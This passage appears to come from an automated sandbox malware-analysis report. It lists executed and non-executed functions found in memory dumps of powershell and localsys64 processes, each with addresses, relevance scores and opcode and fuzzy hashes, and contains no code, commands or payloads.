                                                    • Instruction Fuzzy Hash: EA21E63190CB4C8FEB59DBAC984A6E97FE0EB56321F04426BD049C3152DA74A456CB91
                                                    Function 00007FFD9B9640BF Relevance: .1, Instructions: 99COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2233252593.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 48289b6e62abc9ee90df9b5320ee14c73240e16646f46212d2376ef60dac40d3
                                                    • Instruction ID: 23c364d10dd7a0cd8e4307c0934906e771e0861313b86c2ef1ea9a5b9fee6537
                                                    • Opcode Fuzzy Hash: 48289b6e62abc9ee90df9b5320ee14c73240e16646f46212d2376ef60dac40d3
                                                    • Instruction Fuzzy Hash: E421C222F2E98AAFE7B9DA98446227467C1EF71210B4B40BED05DC76A2DE14EC048341
                                                    Function 00007FFD9B9643BC Relevance: .1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2233252593.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4419559b07b4149f04d4e90e755ae3d277f6e681b5239fcf11204e191728affd
                                                    • Instruction ID: 4cbdea75ce6c10ec3ca0f0c4665938f54df4a801edf300bfcb1188a8d2060653
                                                    • Opcode Fuzzy Hash: 4419559b07b4149f04d4e90e755ae3d277f6e681b5239fcf11204e191728affd
                                                    • Instruction Fuzzy Hash: 04110232F2F58A9FE7B5D7989475AB87BD0EF40620B4A00BED05DC72A6DA19AC008341
                                                    Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2231811315.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                                    Function 00007FFD9B893428 Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2231811315.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 62127e3d444d1f3b244f25c17acd236f5c37e1009a043705ab73a390ba55dfe4
                                                    • Instruction ID: d122a13e5ebb840b0119f187c366a800e56cd990694709f4513719f723beab97
                                                    • Opcode Fuzzy Hash: 62127e3d444d1f3b244f25c17acd236f5c37e1009a043705ab73a390ba55dfe4
                                                    • Instruction Fuzzy Hash: 3DF03C7264E7860FF7664B6CAC624A47FB0DF5323070A42EBD4D1CB4B3D51A584B8751

                                                    Non-executed Functions

                                                    Function 00007FFD9B898BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2231811315.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                    • API String ID: 0-962139525
                                                    • Opcode ID: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                    • Instruction ID: ad9997269ca045c2f6f29c292932e0e691c5b571fa522245f23bec43a457ca72
                                                    • Opcode Fuzzy Hash: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
                                                    • Instruction Fuzzy Hash: 2021C2B3B04525CAD30A36ACBC559D87780DF5437938603F3E029CF193F958A48B8A81
                                                    Function 00007FFD9B8989F2 Relevance: 7.6, Strings: 6, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.2231811315.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M_^$M_^$M_^$M_^$M_^$M_^
                                                    • API String ID: 0-3353809593
                                                    • Opcode ID: 4b1fcaf9e51a82a6fdb70ee5592b217fd560ad712bb5caf9c8b42d267289fae5
                                                    • Instruction ID: 4674117365168a808c4deb580dbc406ae03ce5654a1481f1570fa01b5ede29e7
                                                    • Opcode Fuzzy Hash: 4b1fcaf9e51a82a6fdb70ee5592b217fd560ad712bb5caf9c8b42d267289fae5
                                                    • Instruction Fuzzy Hash: FC31E5A3B0BADB4BEB6F062A48654957FD0FF26BD871A03F2C0D48A0A3BC146D434552

                                                    Executed Functions

                                                    Function 00007FFD9B870728 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: P_^
                                                    • API String ID: 0-2466244897
                                                    • Opcode ID: 48ca449519ab1e8a842bc12aade788b16516ad256fff4f6ab01e98df2545ff3e
                                                    • Instruction ID: 70586c497a3379f9d0f37f5ef2f1575d33ee9e1360fe9d7754d30d12e170d5e6
                                                    • Opcode Fuzzy Hash: 48ca449519ab1e8a842bc12aade788b16516ad256fff4f6ab01e98df2545ff3e
                                                    • Instruction Fuzzy Hash: C55138A6B0901D8FD308BB6CACF59E97B61FF8431878441B2D0ADC72DBED342942C641
                                                    Function 00007FFD9B870C3E Relevance: .8, Instructions: 750COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 94a649cca547d5256ee17adbfce07744b0121497a7709dd0cc6d5e465c045172
                                                    • Instruction ID: 0648960b229e0f433151a49a310ccfaeab53e181b9bffcf7a7d94d40078d4ad4
                                                    • Opcode Fuzzy Hash: 94a649cca547d5256ee17adbfce07744b0121497a7709dd0cc6d5e465c045172
                                                    • Instruction Fuzzy Hash: A5817821B1E68A0FE756E77C88B55B93BE1EF8A214B0900FBD04DC71E7DD286C428352
                                                    Function 00007FFD9B8712C9 Relevance: .2, Instructions: 241COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c40e16ac9257fe6ff57e8feba928e783516a3ed3af0b6774c561f085e3628057
                                                    • Instruction ID: 179c1be3f367aa5b75aa6ec5990e2fd30fc6530baeb487a51255ac8a5d19158f
                                                    • Opcode Fuzzy Hash: c40e16ac9257fe6ff57e8feba928e783516a3ed3af0b6774c561f085e3628057
                                                    • Instruction Fuzzy Hash: D871A771F2951D4FDB98FB7894B9ABD76A2FF98305F900478E00EC32D6DE2869018341
                                                    Function 00007FFD9B8704D8 Relevance: .1, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7d1c97a4085da6a89cae1f23fc29bb6da70f82742e570f16e49037f9041c9219
                                                    • Instruction ID: 8ffb20eee8bba8252c525b0a3b6199efb64db8deb6d144487e018bf106ee479d
                                                    • Opcode Fuzzy Hash: 7d1c97a4085da6a89cae1f23fc29bb6da70f82742e570f16e49037f9041c9219
                                                    • Instruction Fuzzy Hash: F331D521B189480FEB98FB6C9869A79A6C2EFDC755F0505BEE04EC32E7DD246C418341
                                                    Function 00007FFD9B871CD8 Relevance: .1, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f5b915ec5b862c9ac4b6d5565fb80551f64c9732b285b338f7a579000eab97cb
                                                    • Instruction ID: e74931dbc3640375de6a2ecd0b1173bfd15d62dbfbf6a2e8ae9e08b825d548a8
                                                    • Opcode Fuzzy Hash: f5b915ec5b862c9ac4b6d5565fb80551f64c9732b285b338f7a579000eab97cb
                                                    • Instruction Fuzzy Hash: B831F521B1C9480FEB98EB6C9869A79B7D2EFD8609F0505BEE05DC32E7DD249C428341
                                                    Function 00007FFD9B870AD1 Relevance: .1, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 314ab2cb3e80fd9426e2e2cc1ec530d45ff226219e5ff1b235b28dc6aa041a84
                                                    • Instruction ID: 2e6ed23468c7331bf92d9d37fc7b7734d793fe29aca57176844dfb091344238f
                                                    • Opcode Fuzzy Hash: 314ab2cb3e80fd9426e2e2cc1ec530d45ff226219e5ff1b235b28dc6aa041a84
                                                    • Instruction Fuzzy Hash: 48312561B19A094FEB58B7B85C69ABC77D6EF98714F0502B7E01CC32D6DD2869028391
                                                    Function 00007FFD9B870985 Relevance: .1, Instructions: 114COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a54e54d44ff8994cfdae86960a8ce5125a7b645a8abbe41d1428e8d0f891b0c
                                                    • Instruction ID: 023a4ed746077d82548a5bda84642b96066e9058d3dc0e2027efabd5e0bb546c
                                                    • Opcode Fuzzy Hash: 2a54e54d44ff8994cfdae86960a8ce5125a7b645a8abbe41d1428e8d0f891b0c
                                                    • Instruction Fuzzy Hash: 1A318171F19A0D8FEB48EBA898A57ADB7A1FF98301F500579D009D32D6DE386841C741
                                                    Function 00007FFD9B8707D3 Relevance: .1, Instructions: 113COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: db0f52d7e0f39a911b2c18882646a9ea0fba8a3bf84f09f080b115f91c5bf005
                                                    • Instruction ID: 6e3b892746c8ef321c2946e25fe2c93580b85c710158a0e4b9cfb1286dfe9e96
                                                    • Opcode Fuzzy Hash: db0f52d7e0f39a911b2c18882646a9ea0fba8a3bf84f09f080b115f91c5bf005
                                                    • Instruction Fuzzy Hash: 2C311066B4A64D5FD308EB2C98F49A8BF61EF84354B8441BAD049C32EBDE346802C352
                                                    Function 00007FFD9B870845 Relevance: .1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6ef7b8c50dbcbcde05e61502fb49569695247e5d68ce73562e770d66f5be39a9
                                                    • Instruction ID: 600c7a7b7c3f1d8a8efb6c5560ad7dd1298e9bc350650ab6488bc4dd05324c3a
                                                    • Opcode Fuzzy Hash: 6ef7b8c50dbcbcde05e61502fb49569695247e5d68ce73562e770d66f5be39a9
                                                    • Instruction Fuzzy Hash: A731E175B4960D4FD348EB2C94B49A9BFB1EFC4304B8045B9D05DC32EADE346802C751
                                                    Function 00007FFD9B870860 Relevance: .1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 91010e3f4af6b77f259e969c51722d453e65d31ed6ef4262281df9fd6583b159
                                                    • Instruction ID: 63420b82900dfe5eef696cd4b7b38bd6fcce4c10c8a654be6bb416eb199abf67
                                                    • Opcode Fuzzy Hash: 91010e3f4af6b77f259e969c51722d453e65d31ed6ef4262281df9fd6583b159
                                                    • Instruction Fuzzy Hash: 3221AEA5B5990D5FD348EB2C94B49A9BF71EFC8300B8044B5E01DC33EADE746901C751
                                                    Function 00007FFD9B871E11 Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.2315537414.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_7ffd9b870000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 54cd4c67d16766485b9f29893b5767c20305fdc1dc7ad88835801c7340125543
                                                    • Instruction ID: bbeb7872a8a87c581a9d85ff303238cc518abe03d0732ba97da54d9627e6107b
                                                    • Opcode Fuzzy Hash: 54cd4c67d16766485b9f29893b5767c20305fdc1dc7ad88835801c7340125543
                                                    • Instruction Fuzzy Hash: DD017B11B0E6890FE796637818B54757FF0CF96305B0504BAE888C31E7D908AB858382

                                                    Executed Functions

                                                    Function 00007FFD9B8A12C9 Relevance: .8, Instructions: 810COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2382424983.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd9b8a0000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aa7e2b6aabb9800dd4d00c8d603b0abb9f8f2c866ec4257c053607e0c92c289e
                                                    • Instruction ID: 03b87557de418661f8574ffcb5416977d384ec99ce1729f95c674d3ef55614cc
                                                    • Opcode Fuzzy Hash: aa7e2b6aabb9800dd4d00c8d603b0abb9f8f2c866ec4257c053607e0c92c289e
                                                    • Instruction Fuzzy Hash: 7F42CA61B29A494FEB98FB7C98656B977D2FF9C300F440579E01EC32D6DE28A8418351
                                                    Function 00007FFD9B8A1C5D Relevance: .2, Instructions: 197COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2382424983.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd9b8a0000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bfb3f3203e12b14a13fe901e65fb513ddcff666df625626a8875c68fb5a81519
                                                    • Instruction ID: 5e98ea889b6a4d42797f5926819c1c019b39ce6b3bab2a0bbb33f2ad069c3825
                                                    • Opcode Fuzzy Hash: bfb3f3203e12b14a13fe901e65fb513ddcff666df625626a8875c68fb5a81519
                                                    • Instruction Fuzzy Hash: 00510E20B0E6C94FD79AAB7858746757FE1DF8B219B0801FBE089C71E7DD085806C352
                                                    Function 00007FFD9B8A0728 Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2382424983.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd9b8a0000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: M_^
                                                    • API String ID: 0-814507619
                                                    • Opcode ID: 39578a60b2c0ef37fc48425c14e5047d70278bec391f2a6f73fac4906e05e5ca
                                                    • Instruction ID: fd42964d397d6af7c1b337e6931672aa79d897f1d356bf3433616cbe08724e82
                                                    • Opcode Fuzzy Hash: 39578a60b2c0ef37fc48425c14e5047d70278bec391f2a6f73fac4906e05e5ca
                                                    • Instruction Fuzzy Hash: 1F518A72B0D5998FE71AA76CAC758E97FA0EF8421878441B6D0ACCB1D7ED383406C761
                                                    Function 00007FFD9B8A0C3E Relevance: .8, Instructions: 750COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2382424983.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd9b8a0000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9158ebc606dbdcf20e505d6bc3bb9a23bbd557f40e91c3b3220c1f3f1c6a6a36
                                                    • Instruction ID: 504c83af20e32d057d500b98fa05305ea2cb2968c8d62e6bbe74fb8170ab6478
                                                    • Opcode Fuzzy Hash: 9158ebc606dbdcf20e505d6bc3bb9a23bbd557f40e91c3b3220c1f3f1c6a6a36
                                                    • Instruction Fuzzy Hash: 77816622B1EA8A0FE75AE77898755B97BE1EF86210B0901FBD04DC71E7DD1C68068351
                                                    Function 00007FFD9B8A04D8 Relevance: .1, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2382424983.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd9b8a0000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a006cc9e7f2e5ca95ade2ea5b7b4587dd47213fbf1260adddf8ab76530e21fa2
                                                    • Instruction ID: 202e449aa168cf8821caf4c818108d038cc464a389db5f51868d814e93983552
                                                    • Opcode Fuzzy Hash: a006cc9e7f2e5ca95ade2ea5b7b4587dd47213fbf1260adddf8ab76530e21fa2
                                                    • Instruction Fuzzy Hash: 6E31D521B1894C0FEB98FB6C9869679B6C2EF9D745F0505BEE04EC32E7DD689C418341
                                                    Function 00007FFD9B8A0AD1 Relevance: .1, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2382424983.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd9b8a0000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3110af5a3384009b0a8b6ae6c098af2584134a50eb36a1734d34e0af49120430
                                                    • Instruction ID: 93d2d00c163cb1fecb928ffd327d637ea2e2cf97c411acb2226b9888ec9f6889
                                                    • Opcode Fuzzy Hash: 3110af5a3384009b0a8b6ae6c098af2584134a50eb36a1734d34e0af49120430
                                                    • Instruction Fuzzy Hash: 9531F861F19A094FE758BBAC5C297BC77D2EF99611F0502B7E01DC32D6DD2868028351
                                                    Function 00007FFD9B8A0985 Relevance: .1, Instructions: 114COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2382424983.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd9b8a0000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 644ac27ef262c395dfa55589967b272c3e81536f31443a8001c4791ddfb53631
                                                    • Instruction ID: 31f07664d7e7992d7ecd918617a017c8fd6b6f03b6e640710f1706dc2f0d86ca
                                                    • Opcode Fuzzy Hash: 644ac27ef262c395dfa55589967b272c3e81536f31443a8001c4791ddfb53631
                                                    • Instruction Fuzzy Hash: DE318F70B18A0D8FEF58EBA8D865AEDB7A1FF98300F5405B9D019D32C6DE38A845C751
                                                    Function 00007FFD9B8A0860 Relevance: .1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2382424983.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd9b8a0000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3dd4a704c83183826ab3b5369e6994eae87a48cd0e139f4019931ffdc8ec8ac8
                                                    • Instruction ID: ea31b8a359062f9551e7dea6f5db4b2de8307a0b1f1deda50ee24f1616d16d84
                                                    • Opcode Fuzzy Hash: 3dd4a704c83183826ab3b5369e6994eae87a48cd0e139f4019931ffdc8ec8ac8
                                                    • Instruction Fuzzy Hash: EC21D835B589494FDB4DEB6898A48E9BF71EFC8200BC044A5E41DC33DBDE3869058761
                                                    Function 00007FFD9B8A1E11 Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2382424983.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_7ffd9b8a0000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 55770ec26572c14c32f96d57365fead4642a90fb23900d4ee1d276d7ebb78edf
                                                    • Instruction ID: c15642ba3d8aa7cb68e3bce55e6a26b1ebbe18ea0be1c4b3299ebf3c6731cbe8
                                                    • Opcode Fuzzy Hash: 55770ec26572c14c32f96d57365fead4642a90fb23900d4ee1d276d7ebb78edf
                                                    • Instruction Fuzzy Hash: C8017B20A0D6890FEB95733818A44717FE0CF86300B0905BAE8C8C60A7D908AB85C3A2

                                                    Executed Functions

                                                    Function 00007FFD9B8812C9 Relevance: .8, Instructions: 810COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a0e1df6d8ad2dff97dd48b97e3c6a7c750d86c94f572624791365c8dc69ce64
                                                    • Instruction ID: db9a60c9652ea9bc4cd5ed50f53d225abbfeeea37be1c5ce7ef9ef995f463e97
                                                    • Opcode Fuzzy Hash: 0a0e1df6d8ad2dff97dd48b97e3c6a7c750d86c94f572624791365c8dc69ce64
                                                    • Instruction Fuzzy Hash: 7F42D820B29E494FE798FB789869AB977D2FF9C304F400579E45DC32DADE38A8018741
                                                    Function 00007FFD9B881C5D Relevance: .2, Instructions: 197COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: afe42508ff99804ae6cb6add7f67b524a7b3edbc95516f26c86ed12908b074cd
                                                    • Instruction ID: 319239ba9dfc210b517a69899a330e5af1aee9567e3ce1bc17b9905eb44c4000
                                                    • Opcode Fuzzy Hash: afe42508ff99804ae6cb6add7f67b524a7b3edbc95516f26c86ed12908b074cd
                                                    • Instruction Fuzzy Hash: E7511F10B0EAC94FD79AAB7858746757FE2DF8B219B0900FBE099C71E7DD181806C342
                                                    Function 00007FFD9B880728 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: O_^
                                                    • API String ID: 0-2592452328
                                                    • Opcode ID: 72fc99002b80110346323c147c98e8f8f740bc9f554a44eea719564b4b57c40e
                                                    • Instruction ID: 86033552ace1d721d44593c20b8c5873b6842c059fe5a7d3c0c222ad5f2b58eb
                                                    • Opcode Fuzzy Hash: 72fc99002b80110346323c147c98e8f8f740bc9f554a44eea719564b4b57c40e
                                                    • Instruction Fuzzy Hash: 64518972B0A51E8BD35DBB6CAC788E97B61EF4531C74440B2D06D872CBEE3824438691
                                                    Function 00007FFD9B880C3E Relevance: .8, Instructions: 750COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_7ffd9b880000_localsys64.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fddd88964288d9497e80cc9b92043f88f5d4d950608bc39f6880e83b0f2b8ece
                                                    • Instruction ID: 0743c3c533b5139256658338ecea23787c429ef08051416f46d2fbd2193c8ece
                                                    • Opcode Fuzzy Hash: fddd88964288d9497e80cc9b92043f88f5d4d950608bc39f6880e83b0f2b8ece
                                                    • Instruction Fuzzy Hash: 30815621B1EA8A0FE756E77C98755F97BE1EF8A210B0900BBD05DC71E7DD286C428351
                                                    Function 00007FFD9B8804D8 Relevance: .1, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.2463220529.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                    Joe Sandbox IDA Plugin
